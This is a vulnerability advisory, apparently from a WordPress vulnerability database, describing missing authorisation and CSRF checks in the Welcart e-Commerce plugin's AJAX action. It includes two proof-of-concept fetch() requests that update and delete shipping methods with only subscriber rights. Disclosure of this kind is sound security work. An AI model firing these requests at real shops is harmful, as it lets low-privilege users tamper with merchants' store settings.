Lucene search

K
wpvulndbLana CodesWPVDB-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0
HistoryNov 21, 2022 - 12:00 a.m.

Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion

2022-11-2100:00:00
Lana Codes
wpscan.com
6
welcart e-commerce
arbitrary shipping method
ajax
csrf
exploit
subscriber role

0.001 Low

EPSS

Percentile

21.4%

The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.

PoC

wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control update shipping method name (#0 shipping method id) exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=shop_options_ajax&mode;=update_delivery_method&name;=UPDATE&id;=0&time;=&charge;=-1&days;=-1&nocod;=0&intl;=0&cool;_category=0’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The exploit requires at least a subscriber role. -– delete shipping method (#0 shipping method id) exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=shop_options_ajax&mode;=delete_delivery_method&id;=0’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The exploit requires at least a subscriber role.

CPENameOperatorVersion
usc-e-shoplt2.7.8

0.001 Low

EPSS

Percentile

21.4%

Related for WPVDB-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0